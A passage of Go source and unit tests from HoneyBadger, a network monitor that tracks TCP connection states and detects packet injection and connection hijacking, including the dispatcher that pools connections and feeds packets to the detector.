c.closingSeq = types.Sequence(p.TCP.Seq)
return
}
if p.TCP.FIN {
c.closingFIN = true
c.closingFlow = p.Flow
c.state = TCP_CONNECTION_CLOSING
*closerState = TCP_FIN_WAIT1
*remoteState = TCP_CLOSE_WAIT
return
}
} else if diff > 0 { // future-out-of-order packet case
if p.Flow.Equal(c.clientFlow) {
c.clientNextSeq, isEnd = c.ServerCoalesce.insert(p, c.clientNextSeq)
} else {
c.serverNextSeq, isEnd = c.ClientCoalesce.insert(p, c.serverNextSeq)
}
if isEnd {
c.state = TCP_CLOSED
c.closingFlow = p.Flow
c.closingSeq = types.Sequence(p.TCP.Seq)
}
}
}
// stateFinWait1 handles packets for the FIN-WAIT-1 state
//func (c *Connection) stateFinWait1(p *types.PacketManifest) {
func (c *Connection) stateFinWait1(p *types.PacketManifest, flow *types.TcpIpFlow, nextSeqPtr *types.Sequence, nextAckPtr *types.Sequence, statePtr, otherStatePtr *uint8) {
c.detectCensorInjection(p)
diff := nextSeqPtr.Difference(types.Sequence(p.TCP.Seq))
if diff > 0 {
// future out of order
log.Print("FIN-WAIT-1: ignoring out of order packet")
return
} else if diff == 0 {
if len(p.Payload) > 0 {
reassembly := types.Reassembly{
Seq: types.Sequence(p.TCP.Seq),
Bytes: []byte(p.Payload),
Seen: p.Timestamp,
}
if p.Flow.Equal(c.clientFlow) {
c.ServerStreamRing.Reassembly = &reassembly
c.ServerStreamRing = c.ServerStreamRing.Next()
c.clientNextSeq = types.Sequence(p.TCP.Seq).Add(len(p.Payload))
c.clientNextSeq, _ = c.ServerCoalesce.addContiguous(c.clientNextSeq)
} else {
c.ClientStreamRing.Reassembly = &reassembly
c.ClientStreamRing = c.ClientStreamRing.Next()
c.serverNextSeq = types.Sequence(p.TCP.Seq).Add(len(p.Payload))
c.serverNextSeq, _ = c.ClientCoalesce.addContiguous(c.serverNextSeq)
}
}
if p.TCP.ACK {
*nextAckPtr += 1
if p.TCP.FIN {
*statePtr = TCP_CLOSING
*otherStatePtr = TCP_LAST_ACK
*nextSeqPtr = types.Sequence(p.TCP.Seq).Add(len(p.Payload) + 1)
if types.Sequence(p.TCP.Ack).Difference(*nextAckPtr) != 0 {
log.Printf("FIN-WAIT-1: unexpected ACK: got %d expected %d TCP.Seq %d\n", p.TCP.Ack, *nextAckPtr, p.TCP.Seq)
c.closingFlow = p.Flow
c.closingSeq = types.Sequence(p.TCP.Seq)
return
}
} else {
*statePtr = TCP_FIN_WAIT2
*nextSeqPtr = types.Sequence(p.TCP.Seq).Add(len(p.Payload))
}
} else {
log.Print("FIN-WAIT-1: non-ACK packet received.\n")
c.closingFlow = p.Flow
c.closingSeq = types.Sequence(p.TCP.Seq)
return
}
}
}
// stateFinWait2 handles packets for the FIN-WAIT-2 state
func (c *Connection) stateFinWait2(p *types.PacketManifest, flow *types.TcpIpFlow, nextSeqPtr *types.Sequence, nextAckPtr *types.Sequence, statePtr *uint8) {
c.detectCensorInjection(p)
diff := nextSeqPtr.Difference(types.Sequence(p.TCP.Seq))
if diff > 0 {
// future out of order
log.Print("FIN-WAIT-2: out of order packet received.\n")
log.Printf("got TCP.Seq %d expected %d\n", p.TCP.Seq, *nextSeqPtr)
} else if diff == 0 {
// contiguous
if p.TCP.ACK && p.TCP.FIN {
*nextSeqPtr += 1
*statePtr = TCP_TIME_WAIT
}
}
}
// stateCloseWait represents the TCP FSM's CLOSE-WAIT state
func (c *Connection) stateCloseWait(p *types.PacketManifest) {
var nextSeqPtr *types.Sequence
if p.Flow.Equal(c.clientFlow) {
nextSeqPtr = &c.clientNextSeq
} else {
nextSeqPtr = &c.serverNextSeq
}
diff := types.Sequence(p.TCP.Seq).Difference(*nextSeqPtr)
// stream overlap case
if diff > 0 {
if len(p.Payload) == 0 {
c.detectCensorInjection(p)
}
}
}
// stateTimeWait represents the TCP FSM's CLOSE-WAIT state
func (c *Connection) stateTimeWait(p *types.PacketManifest) {
log.Print("TIME-WAIT: invalid protocol state\n")
c.closingFlow = p.Flow
c.closingSeq = types.Sequence(p.TCP.Seq)
}
// stateClosing represents the TCP FSM's CLOSING state
func (c *Connection) stateClosing(p *types.PacketManifest) {
log.Print("CLOSING: invalid protocol state\n")
}
// stateLastAck represents the TCP FSM's LAST-ACK state
func (c *Connection) stateLastAck(p *types.PacketManifest, flow *types.TcpIpFlow, nextSeqPtr *types.Sequence, nextAckPtr *types.Sequence, statePtr *uint8) {
if types.Sequence(p.TCP.Seq).Difference(*nextSeqPtr) == 0 {
if p.TCP.ACK && (!p.TCP.FIN && !p.TCP.SYN) {
if types.Sequence(p.TCP.Ack).Difference(*nextAckPtr) != 0 {
log.Printf("LAST-ACK: out of order ACK packet received. seq %d != nextAck %d\n", p.TCP.Ack, *nextAckPtr)
}
} else {
log.Print("LAST-ACK: protocol anamoly\n")
}
} else {
log.Print("LAST-ACK: out of order packet received\n")
log.Printf("LAST-ACK: out of order packet received; got %d expected %d\n", p.TCP.Seq, *nextSeqPtr)
}
c.state = TCP_CLOSED
}
func (c *Connection) detectCensorInjection(p *types.PacketManifest) {
var attackType string
if p.TCP.FIN || p.TCP.RST {
// ignore "closing" retransmissions
return
}
if len(p.Payload) == 0 {
return
}
if c.closingRST {
attackType = "censor-injection-RST_"
} else if c.closingFIN {
attackType = "censor-injection-FIN_"
} else {
attackType = "censor-injection-coalesce_"
}
if c.closingFlow != nil {
if p.Flow.Equal(c.closingFlow) && types.Sequence(p.TCP.Seq).Difference(c.closingSeq) == 0 {
attackType += "closing-sequence-overlap"
} else {
return
}
} else {
return
}
event := types.Event{
Type: attackType,
PacketCount: c.packetCount,
Time: time.Now(),
Flow: *p.Flow,
Start: types.Sequence(p.TCP.Seq),
}
c.AttackLogger.Log(&event)
c.attackDetected = true
}
func (c *Connection) stateClosed(p *types.PacketManifest) {
var nextSeqPtr *types.Sequence
if p.Flow.Equal(c.clientFlow) {
nextSeqPtr = &c.clientNextSeq
} else {
nextSeqPtr = &c.serverNextSeq
}
if *nextSeqPtr != types.InvalidSequence {
c.detectCensorInjection(p)
}
}
// stateConnectionClosing handles all the closing states until the closed state has been reached.
func (c *Connection) stateConnectionClosing(p *types.PacketManifest) {
var nextSeqPtr *types.Sequence
var nextAckPtr *types.Sequence
var statePtr, otherStatePtr *uint8
if c.clientFlow.Equal(p.Flow) {
statePtr = &c.clientState
otherStatePtr = &c.serverState
nextSeqPtr = &c.clientNextSeq
nextAckPtr = &c.serverNextSeq
} else {
statePtr = &c.serverState
otherStatePtr = &c.clientState
nextSeqPtr = &c.serverNextSeq
nextAckPtr = &c.clientNextSeq
}
if p.Flow.Equal(c.closingFlow) {
switch *statePtr {
case TCP_CLOSE_WAIT:
c.stateCloseWait(p)
case TCP_LAST_ACK:
c.stateLastAck(p, p.Flow, nextSeqPtr, nextAckPtr, statePtr)
}
} else {
switch *statePtr {
case TCP_FIN_WAIT1:
c.stateFinWait1(p, p.Flow, nextSeqPtr, nextAckPtr, statePtr, otherStatePtr)
case TCP_FIN_WAIT2:
c.stateFinWait2(p, p.Flow, nextSeqPtr, nextAckPtr, statePtr)
case TCP_TIME_WAIT:
c.stateTimeWait(p)
case TCP_CLOSING:
c.stateClosing(p)
}
}
}
// ReceivePacket implements a TCP finite state machine
// which is loosely based off of the simplified FSM in this paper:
// http://ants.iis.sinica.edu.tw/3bkmj9ltewxtsrrvnoknfdxrm3zfwrr/17/p520460.pdf
// The goal is to detect all manner of content injection.
func (c *Connection) ReceivePacket(p *types.PacketManifest) {
c.updateLastSeen(p.Timestamp)
if c.PacketLogger != nil {
c.PacketLogger.WritePacket(p.RawPacket, p.Timestamp)
}
c.packetCount += 1
//log.Printf("packetCount %d\n", c.packetCount)
if c.state != TCP_UNKNOWN {
// detect injection
var nextSeqPtr *types.Sequence
if c.clientFlow.Equal(p.Flow) {
nextSeqPtr = &c.clientNextSeq
} else {
nextSeqPtr = &c.serverNextSeq
}
diff := nextSeqPtr.Difference(types.Sequence(p.TCP.Seq))
if diff < 0 {
// overlap
if len(p.Payload) > 0 {
c.detectInjection(p)
}
}
}
// simplified TCP state machine
switch c.state {
case TCP_UNKNOWN:
c.stateUnknown(p)
case TCP_CONNECTION_REQUEST:
c.stateConnectionRequest(p)
case TCP_CONNECTION_ESTABLISHED:
c.stateConnectionEstablished(p)
case TCP_DATA_TRANSFER:
c.stateDataTransfer(p)
case TCP_CONNECTION_CLOSING:
c.stateConnectionClosing(p)
case TCP_CLOSED:
c.stateClosed(p)
}
}
================================================
FILE: connection_test.go
================================================
package HoneyBadger
import (
"log"
"net"
"testing"
"time"
"github.com/david415/HoneyBadger/types"
"github.com/google/gopacket"
"github.com/google/gopacket/layers"
)
func TestStateDataTransfer(t *testing.T) {
options := ConnectionOptions{
MaxBufferedPagesTotal: 0,
MaxBufferedPagesPerConnection: 0,
MaxRingPackets: 40,
PageCache: nil,
LogDir: "fake-log-dir",
AttackLogger: NewDummyAttackLogger(),
}
f := &DefaultConnFactory{}
conn := f.Build(options).(*Connection)
conn.state = TCP_DATA_TRANSFER
clientRingCount := 0
ip := layers.IPv4{
SrcIP: net.IP{1, 2, 3, 4},
DstIP: net.IP{2, 3, 4, 5},
Version: 4,
TTL: 64,
Protocol: layers.IPProtocolTCP,
}
tcp := layers.TCP{
Seq: 3,
SYN: false,
SrcPort: 1,
DstPort: 2,
}
flow := types.NewTcpIp4FlowFromLayers(ip, tcp)
p := types.PacketManifest{
Timestamp: time.Now(),
Flow: flow,
IPv4: &ip,
TCP: &tcp,
Payload: []byte{1, 2, 3, 4, 5, 6, 7},
}
conn.serverFlow = flow
flo := flow.Reverse()
conn.clientFlow = &flo
conn.clientNextSeq = 9666
conn.serverNextSeq = 3
conn.ReceivePacket(&p)
if conn.state != TCP_DATA_TRANSFER {
t.Error("invalid state transition\n")
t.Fail()
}
clientRingCount = conn.ClientStreamRing.Prev().Count()
if clientRingCount != 1 {
t.Errorf("clientRingCount %d not correct", clientRingCount)
t.Fail()
}
// next set of tests
tcp = layers.TCP{
Seq: 10,
SYN: false,
SrcPort: 1,
DstPort: 2,
}
p = types.PacketManifest{
Timestamp: time.Now(),
Flow: flow,
IPv4: &ip,
TCP: &tcp,
Payload: []byte{1, 2, 3, 4, 5, 6, 7},
}
conn.ReceivePacket(&p)
if conn.state != TCP_DATA_TRANSFER {
t.Error("invalid state transition\n")
t.Fail()
}
clientRingCount = conn.ClientStreamRing.Prev().Count()
if clientRingCount != 2 {
t.Errorf("clientRingCount %d not correct", clientRingCount)
t.Fail()
}
// next test
tcp = layers.TCP{
Seq: 5,
SYN: false,
SrcPort: 1,
DstPort: 2,
}
p = types.PacketManifest{
Timestamp: time.Now(),
Flow: flow,
IPv4: &ip,
TCP: &tcp,
Payload: []byte{1, 2, 3, 4, 5, 6, 7},
}
conn.ReceivePacket(&p)
if conn.state != TCP_DATA_TRANSFER {
t.Error("invalid state transition\n")
t.Fail()
}
clientRingCount = conn.ClientStreamRing.Prev().Count()
if clientRingCount != 2 {
t.Errorf("clientRingCount %d not correct", clientRingCount)
t.Fail()
}
}
func TestTCPConnect(t *testing.T) {
options := ConnectionOptions{
MaxBufferedPagesTotal: 0,
MaxBufferedPagesPerConnection: 0,
MaxRingPackets: 40,
PageCache: nil,
LogDir: "fake-log-dir",
}
f := &DefaultConnFactory{}
conn := f.Build(options).(*Connection)
ip := layers.IPv4{
SrcIP: net.IP{1, 2, 3, 4},
DstIP: net.IP{2, 3, 4, 5},
Version: 4,
TTL: 64,
Protocol: layers.IPProtocolTCP,
}
tcp := layers.TCP{
Seq: 3,
SYN: true,
ACK: false,
SrcPort: 1,
DstPort: 2,
}
ipFlow, _ := gopacket.FlowFromEndpoints(layers.NewIPEndpoint(net.IPv4(1, 2, 3, 4)), layers.NewIPEndpoint(net.IPv4(2, 3, 4, 5)))
tcpFlow, _ := gopacket.FlowFromEndpoints(layers.NewTCPPortEndpoint(layers.TCPPort(1)), layers.NewTCPPortEndpoint(layers.TCPPort(2)))
flow := types.NewTcpIpFlowFromFlows(ipFlow, tcpFlow)
p := types.PacketManifest{
Timestamp: time.Now(),
Flow: &flow,
IPv4: &ip,
TCP: &tcp,
Payload: []byte{},
}
tcp.SetNetworkLayerForChecksum(&ip)
flowReversed := flow.Reverse()
conn.clientFlow = &flow
conn.serverFlow = &flowReversed
conn.ReceivePacket(&p)
if conn.state != TCP_CONNECTION_REQUEST {
t.Error("invalid state transition\n")
t.Fail()
}
// next state transition test
ip = layers.IPv4{
SrcIP: net.IP{2, 3, 4, 5},
DstIP: net.IP{1, 2, 3, 4},
Version: 4,
TTL: 64,
Protocol: layers.IPProtocolTCP,
}
tcp = layers.TCP{
Seq: 9,
SYN: true,
ACK: true,
Ack: 4,
SrcPort: 2,
DstPort: 1,
}
p = types.PacketManifest{
Timestamp: time.Now(),
Flow: &flowReversed,
IPv4: &ip,
TCP: &tcp,
Payload: []byte{},
}
conn.ReceivePacket(&p)
if conn.state != TCP_CONNECTION_ESTABLISHED {
t.Errorf("invalid state transition: current state %d\n", conn.state)
t.Fail()
}
// next state transition test
ip = layers.IPv4{
SrcIP: net.IP{1, 2, 3, 4},
DstIP: net.IP{2, 3, 4, 5},
Version: 4,
TTL: 64,
Protocol: layers.IPProtocolTCP,
}
tcp = layers.TCP{
Seq: 4,
SYN: false,
ACK: true,
Ack: 10,
SrcPort: 1,
DstPort: 2,
}
p = types.PacketManifest{
Timestamp: time.Now(),
Flow: &flow,
IPv4: &ip,
TCP: &tcp,
Payload: []byte{},
}
conn.ReceivePacket(&p)
if conn.state != TCP_DATA_TRANSFER {
t.Error("invalid state transition\n")
t.Fail()
}
}
func TestClientThreeWayClose(t *testing.T) {
HelperTestThreeWayClose(true, t)
}
func TestServerThreeWayClose(t *testing.T) {
HelperTestThreeWayClose(false, t)
}
func HelperTestThreeWayClose(isClient bool, t *testing.T) {
PageCache := newPageCache()
var closerState, remoteState *uint8
attackLogger := NewDummyAttackLogger()
options := ConnectionOptions{
MaxBufferedPagesTotal: 0,
MaxBufferedPagesPerConnection: 0,
MaxRingPackets: 40,
PageCache: PageCache,
LogDir: "fake-log-dir",
}
f := &DefaultConnFactory{}
conn := f.Build(options).(*Connection)
conn.AttackLogger = attackLogger
conn.state = TCP_DATA_TRANSFER
conn.serverNextSeq = 4666
conn.clientNextSeq = 9666
if isClient {
closerState = &conn.clientState
remoteState = &conn.serverState
} else {
closerState = &conn.serverState
remoteState = &conn.clientState
}
ipFlow, _ := gopacket.FlowFromEndpoints(layers.NewIPEndpoint(net.IPv4(1, 2, 3, 4)), layers.NewIPEndpoint(net.IPv4(2, 3, 4, 5)))
tcpFlow, _ := gopacket.FlowFromEndpoints(layers.NewTCPPortEndpoint(layers.TCPPort(1)), layers.NewTCPPortEndpoint(layers.TCPPort(2)))
ip := layers.IPv4{
SrcIP: net.IP{1, 2, 3, 4},
DstIP: net.IP{2, 3, 4, 5},
Version: 4,
TTL: 64,
Protocol: layers.IPProtocolTCP,
}
tcp := layers.TCP{
Seq: 9666,
Ack: 4111,
FIN: true,
SYN: false,
ACK: true,
SrcPort: 1,
DstPort: 2,
}
flow := types.NewTcpIpFlowFromFlows(ipFlow, tcpFlow)
p := types.PacketManifest{
Timestamp: time.Now(),
Flow: &flow,
IPv4: &ip,
TCP: &tcp,
Payload: []byte{},
}
conn.clientFlow = &flow
ff := flow.Reverse()
conn.serverFlow = &ff
conn.ReceivePacket(&p)
log.Print("meow1")
if conn.state != TCP_CONNECTION_CLOSING {
t.Error("connection state must transition to TCP_CONNECTION_CLOSING\n")
t.Fail()
}
if *closerState != TCP_FIN_WAIT1 {
t.Error("closer state must be in TCP_FINE_WAIT1\n")
t.Fail()
}
if *remoteState != TCP_CLOSE_WAIT {
t.Error("remote state must be in TCP_CLOSE_WAIT\n")
t.Fail()
}
// next state transition
ip = layers.IPv4{
SrcIP: net.IP{2, 3, 4, 5},
DstIP: net.IP{1, 2, 3, 4},
Version: 4,
TTL: 64,
Protocol: layers.IPProtocolTCP,
}
tcp = layers.TCP{
Seq: 4111,
SYN: false,
FIN: true,
ACK: true,
Ack: 9667,
SrcPort: 2,
DstPort: 1,
}
flow2 := flow.Reverse()
p = types.PacketManifest{
Timestamp: time.Now(),
Flow: &flow2,
IPv4: &ip,
TCP: &tcp,
Payload: []byte{},
}
conn.ReceivePacket(&p)
log.Print("meow2")
if conn.state != TCP_CONNECTION_CLOSING {
t.Error("connection state must transition to TCP_CONNECTION_CLOSING\n")
t.Fail()
}
// next state transition
ip = layers.IPv4{
SrcIP: net.IP{1, 2, 3, 4},
DstIP: net.IP{2, 3, 4, 5},
Version: 4,
TTL: 64,
Protocol: layers.IPProtocolTCP,
}
tcp = layers.TCP{
Seq: 9667,
SYN: false,
FIN: false,
ACK: true,
Ack: 4112,
SrcPort: 1,
DstPort: 2,
}
p = types.PacketManifest{
Timestamp: time.Now(),
Flow: &flow,
IPv4: &ip,
TCP: &tcp,
Payload: []byte{},
}
conn.ReceivePacket(&p)
log.Print("freeing page cache")
}
func TestTCPHijack(t *testing.T) {
attackLogger := NewDummyAttackLogger()
options := ConnectionOptions{
MaxBufferedPagesTotal: 0,
MaxBufferedPagesPerConnection: 0,
MaxRingPackets: 40,
PageCache: nil,
LogDir: "fake-log-dir",
DetectHijack: true,
}
f := &DefaultConnFactory{}
conn := f.Build(options).(*Connection)
conn.AttackLogger = attackLogger
ip := layers.IPv4{
SrcIP: net.IP{1, 2, 3, 4},
DstIP: net.IP{2, 3, 4, 5},
Version: 4,
TTL: 64,
Protocol: layers.IPProtocolTCP,
}
tcp := layers.TCP{
Seq: 3,
SYN: true,
ACK: false,
SrcPort: 1,
DstPort: 2,
}
ipFlow, _ := gopacket.FlowFromEndpoints(layers.NewIPEndpoint(net.IPv4(1, 2, 3, 4)), layers.NewIPEndpoint(net.IPv4(2, 3, 4, 5)))
tcpFlow, _ := gopacket.FlowFromEndpoints(layers.NewTCPPortEndpoint(layers.TCPPort(1)), layers.NewTCPPortEndpoint(layers.TCPPort(2)))
flow := types.NewTcpIpFlowFromFlows(ipFlow, tcpFlow)
p := types.PacketManifest{
Timestamp: time.Now(),
Flow: &flow,
IPv4: &ip,
TCP: &tcp,
Payload: []byte{},
}
tcp.SetNetworkLayerForChecksum(&ip)
flowReversed := flow.Reverse()
conn.clientFlow = &flow
conn.serverFlow = &flowReversed
conn.ReceivePacket(&p)
if conn.state != TCP_CONNECTION_REQUEST {
t.Error("invalid state transition\n")
t.Fail()
}
// next state transition test
ip = layers.IPv4{
SrcIP: net.IP{2, 3, 4, 5},
DstIP: net.IP{1, 2, 3, 4},
Version: 4,
TTL: 64,
Protocol: layers.IPProtocolTCP,
}
tcp = layers.TCP{
Seq: 9,
SYN: true,
ACK: true,
Ack: 4,
SrcPort: 2,
DstPort: 1,
}
p = types.PacketManifest{
Timestamp: time.Now(),
Flow: &flowReversed,
IPv4: &ip,
TCP: &tcp,
Payload: []byte{},
}
conn.ReceivePacket(&p)
if conn.state != TCP_CONNECTION_ESTABLISHED {
t.Errorf("invalid state transition: current state %d\n", conn.state)
t.Fail()
}
// test hijack in TCP_CONNECTION_ESTABLISHED state
ip = layers.IPv4{
SrcIP: net.IP{2, 3, 4, 5},
DstIP: net.IP{1, 2, 3, 4},
Version: 4,
TTL: 64,
Protocol: layers.IPProtocolTCP,
}
tcp = layers.TCP{
Seq: 6699,
SYN: true,
ACK: true,
Ack: 4,
SrcPort: 2,
DstPort: 1,
}
p = types.PacketManifest{
Timestamp: time.Now(),
Flow: &flowReversed,
IPv4: &ip,
TCP: &tcp,
Payload: []byte{},
}
conn.ReceivePacket(&p)
if attackLogger.Count != 1 {
t.Error("hijack detection fail")
t.Fail()
}
// next state transition test
ip = layers.IPv4{
SrcIP: net.IP{1, 2, 3, 4},
DstIP: net.IP{2, 3, 4, 5},
Version: 4,
TTL: 64,
Protocol: layers.IPProtocolTCP,
}
tcp = layers.TCP{
Seq: 4,
SYN: false,
ACK: true,
Ack: 10,
SrcPort: 1,
DstPort: 2,
}
p = types.PacketManifest{
Timestamp: time.Now(),
Flow: &flow,
IPv4: &ip,
TCP: &tcp,
Payload: []byte{},
}
conn.ReceivePacket(&p)
if conn.state != TCP_DATA_TRANSFER {
t.Errorf("invalid state transition; state is %d\n", conn.state)
t.Fail()
}
// test hijack in TCP_DATA_TRANSFER state
ip = layers.IPv4{
SrcIP: net.IP{2, 3, 4, 5},
DstIP: net.IP{1, 2, 3, 4},
Version: 4,
TTL: 64,
Protocol: layers.IPProtocolTCP,
}
tcp = layers.TCP{
Seq: 7711,
SYN: true,
ACK: true,
Ack: 4,
SrcPort: 2,
DstPort: 1,
}
p = types.PacketManifest{
Timestamp: time.Now(),
Flow: &flowReversed,
IPv4: &ip,
TCP: &tcp,
Payload: []byte{},
}
conn.ReceivePacket(&p)
if attackLogger.Count != 2 {
t.Error("hijack detection fail")
t.Fail()
}
}
================================================
FILE: dispatcher.go
================================================
/*
* HoneyBadger core library for detecting TCP injection attacks
*
* Copyright (C) 2014, 2015 David Stainton
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
package HoneyBadger
import (
"log"
"time"
"github.com/google/gopacket/layers"
"github.com/david415/HoneyBadger/types"
)
type TimedRawPacket struct {
Timestamp time.Time
RawPacket []byte
}
// InquisitorOptions are user set parameters for specifying the
// details of how to proceed with honey_bager's TCP connection monitoring.
// More parameters should soon be added here!
type DispatcherOptions struct {
BufferedPerConnection int
BufferedTotal int
LogDir string
LogPackets bool
MaxPcapLogRotations int
MaxPcapLogSize int
TcpIdleTimeout time.Duration
MaxRingPackets int
Logger types.Logger
DetectHijack bool
DetectInjection bool
DetectCoalesceInjection bool
MaxConcurrentConnections int
}
// Inquisitor sets up the connection pool and is an abstraction layer for dealing
// with incoming packets weather they be from a pcap file or directly off the wire.
type Dispatcher struct {
options DispatcherOptions
connectionFactory ConnectionFactory
observeConnectionCount int
observeConnectionChan chan bool
dispatchPacketChan chan *types.PacketManifest
stopDispatchChan chan bool
closeConnectionChan chan ConnectionInterface
pageCache *pageCache
PacketLoggerFactory types.PacketLoggerFactory
poolTcpIpv4 map[types.HashedTcpIpv4Flow]ConnectionInterface
poolTcpIpv6 map[types.HashedTcpIpv6Flow]ConnectionInterface
}
// NewInquisitor creates a new Inquisitor struct
func NewDispatcher(options DispatcherOptions, connectionFactory ConnectionFactory, packetLoggerFactory types.PacketLoggerFactory) *Dispatcher {
i := Dispatcher{
PacketLoggerFactory: packetLoggerFactory,
connectionFactory: connectionFactory,
options: options,
dispatchPacketChan: make(chan *types.PacketManifest),
stopDispatchChan: make(chan bool),
closeConnectionChan: make(chan ConnectionInterface),
pageCache: newPageCache(),
observeConnectionChan: make(chan bool, 0),
poolTcpIpv4: make(map[types.HashedTcpIpv4Flow]ConnectionInterface),
poolTcpIpv6: make(map[types.HashedTcpIpv6Flow]ConnectionInterface),
}
return &i
}
func (i *Dispatcher) GetObservedConnectionsChan(count int) chan bool {
i.observeConnectionCount = count
return i.observeConnectionChan
}
// Start... starts the TCP attack inquisition!
func (i *Dispatcher) Start() {
go i.dispatchPackets()
}
// Stop... stops the TCP attack inquisition!
func (i *Dispatcher) Stop() {
i.stopDispatchChan <- true
closedConns := i.CloseAllConnections()
log.Printf("%d connection(s) closed.", closedConns)
}
// connectionsLocked returns a slice of Connection pointers.
func (i *Dispatcher) Connections() []ConnectionInterface {
return i.connections()
}
func (i *Dispatcher) connections() []ConnectionInterface {
conns := make([]ConnectionInterface, 0, len(i.poolTcpIpv4) + len(i.poolTcpIpv6))
for _, conn := range i.poolTcpIpv4 {
conns = append(conns, conn)
}
for _, conn := range i.poolTcpIpv6 {
conns = append(conns, conn)
}
return conns
}
func (i *Dispatcher) ReceivePacket(p *types.PacketManifest) {
i.dispatchPacketChan <- p
}
// CloseOlderThan takes a Time argument and closes all the connections
// that have not received packet since that specified time
func (i *Dispatcher) CloseOlderThan(t time.Time) int {
conns := i.connections()
if conns == nil {
return 0
}
closeList := make([]ConnectionInterface,0)
for _, conn := range conns {
lastSeen := conn.GetLastSeen()
if lastSeen.Equal(t) || lastSeen.Before(t) {
conns = append(conns, conn)
}
}
return i.closeConnectionList(closeList)
}
// CloseAllConnections closes all connections in the pool.
func (i *Dispatcher) CloseAllConnections() int {
conns := i.connections()
if conns == nil {
return 0
}
return i.closeConnectionList(conns)
}
func (i *Dispatcher) closeConnectionList(conns []ConnectionInterface) int {
count := 0
for _, conn := range conns {
tcpip_flow := conn.GetClientFlow()
netFlow, _ := tcpip_flow.Flows()
eType := netFlow.EndpointType()
if eType == layers.EndpointIPv4 {
delete(i.poolTcpIpv4, types.NewHashedTcpIpv4Flow(tcpip_flow))
count += 1
} else if eType == layers.EndpointIPv6 {
delete(i.poolTcpIpv6, types.NewHashedTcpIpv6Flow(tcpip_flow))
count += 1
} else {
panic("wtf")
}
conn.Close()
}
return count
}
func (i *Dispatcher) setupNewConnection(flow *types.TcpIpFlow) ConnectionInterface {
options := ConnectionOptions{
MaxBufferedPagesTotal: i.options.BufferedTotal,
MaxBufferedPagesPerConnection: i.options.BufferedPerConnection,
MaxRingPackets: i.options.MaxRingPackets,
PageCache: i.pageCache,
LogDir: i.options.LogDir,
AttackLogger: i.options.Logger,
LogPackets: i.options.LogPackets,
DetectHijack: i.options.DetectHijack,
DetectInjection: i.options.DetectInjection,
DetectCoalesceInjection: i.options.DetectCoalesceInjection,
}
conn := i.connectionFactory.Build(options)
if i.options.LogPackets {
packetLogger := i.PacketLoggerFactory.Build(flow)
conn.SetPacketLogger(packetLogger)
packetLogger.Start()
}
ipFlow, _ := flow.Flows()
eType := ipFlow.EndpointType()
if eType == layers.EndpointIPv4 {
i.poolTcpIpv4[types.NewHashedTcpIpv4Flow(flow)] = conn
} else if eType == layers.EndpointIPv6 {
i.poolTcpIpv6[types.NewHashedTcpIpv6Flow(flow)] = conn
} else {
panic("wtf")
}
if i.observeConnectionCount != 0 && i.observeConnectionCount == len(i.connections()) {
i.observeConnectionChan <- true
}
return conn
}
func (i *Dispatcher) dispatchPackets() {
var conn ConnectionInterface
timeout := i.options.TcpIdleTimeout
ticker := time.Tick(timeout)
for {
select {
case <-ticker:
closed := i.CloseOlderThan(time.Now().Add(timeout * -1))
if closed != 0 {
log.Printf("timeout closed %d connections\n", closed)
}
case <-i.stopDispatchChan:
return
case packetManifest := <-i.dispatchPacketChan:
ipFlow, _ := packetManifest.Flow.Flows()
eType := ipFlow.EndpointType()
if eType == layers.EndpointIPv4 {
_, ok := i.poolTcpIpv4[types.NewHashedTcpIpv4Flow(packetManifest.Flow)]
if ok {
conn = i.poolTcpIpv4[types.NewHashedTcpIpv4Flow(packetManifest.Flow)]
} else {
if i.options.MaxConcurrentConnections != 0 {
if len(i.poolTcpIpv4) >= i.options.MaxConcurrentConnections {
continue
}
}
conn = i.setupNewConnection(packetManifest.Flow)
}
} else if eType == layers.EndpointIPv6 {
connectionHash := types.NewHashedTcpIpv6Flow(packetManifest.Flow)
_, ok := i.poolTcpIpv6[connectionHash]
if ok {
conn = i.poolTcpIpv6[connectionHash]
} else {
if i.options.MaxConcurrentConnections != 0 {
if len(i.poolTcpIpv6) >= i.options.MaxConcurrentConnections {
continue
}
}
conn = i.setupNewConnection(packetManifest.Flow)
}
} else {
panic("wtf")
}
conn.ReceivePacket(packetManifest)
}
}
}
================================================
FILE: dispatcher_test.go
================================================
package HoneyBadger
import (
"io"
"log"
"net"
"os"
"testing"
"time"
"github.com/david415/HoneyBadger/logging"
"github.com/david415/HoneyBadger/types"
"github.com/google/gopacket/layers"
)
type MockSniffer struct {
supervisor types.Supervisor
startedChan chan bool
}
func NewMockSniffer(options *types.SnifferDriverOptions, dispatcher PacketDispatcher) types.PacketSource {
var packetSource types.PacketSource = &MockSniffer{
startedChan: make(chan bool, 0),
}
return packetSource
}
func (s *MockSniffer) Start() {
log.Print("MockSniffer Start()")
s.startedChan <- true
}
func (s *MockSniffer) Stop() {
log.Print("MockSniffer Stop()")
}
func (s *MockSniffer) SetSupervisor(supervisor types.Supervisor) {
s.supervisor = supervisor
}
func (s *MockSniffer) GetStartedChan() chan bool {
return s.startedChan
}
type MockConnection struct {
options ConnectionOptions
clientFlow types.TcpIpFlow
serverFlow types.TcpIpFlow
lastSeen time.Time
ClientStreamRing *types.Ring
packetObserverChan chan bool
receiveChan chan *types.PacketManifest
}
func (m MockConnection) GetClientFlow() *types.TcpIpFlow {
return &m.clientFlow
}
func (m MockConnection) Close() {
log.Print("MockConnection.Close()")
close(m.receiveChan)
}
func (m MockConnection) ReceivePacket(p *types.PacketManifest) {
m.packetObserverChan <- true
}
func (m MockConnection) GetLastSeen() time.Time {
return m.lastSeen
}
func (m MockConnection) SetPacketLogger(l types.PacketLogger) {
log.Print("MockConnection.SetPacketLogger")
}
type mockConnFactory struct {
}
func (m *mockConnFactory) Build(options ConnectionOptions) ConnectionInterface {
c := &MockConnection{
options: options,
packetObserverChan: make(chan bool, 0),
}
return c
}
type MockPacketLoggerFactory struct {
pcapNum int
pcapSize int
}
func (f MockPacketLoggerFactory) Build(flow *types.TcpIpFlow) types.PacketLogger {
return NewMockPacketLogger("str", flow, 10, 50)
}
type MockPacketLogger struct {
packetObserverChan chan bool
}
func NewMockPacketLogger(str string, flow *types.TcpIpFlow, pcapNum int, pcapSize int) types.PacketLogger {
m := MockPacketLogger{
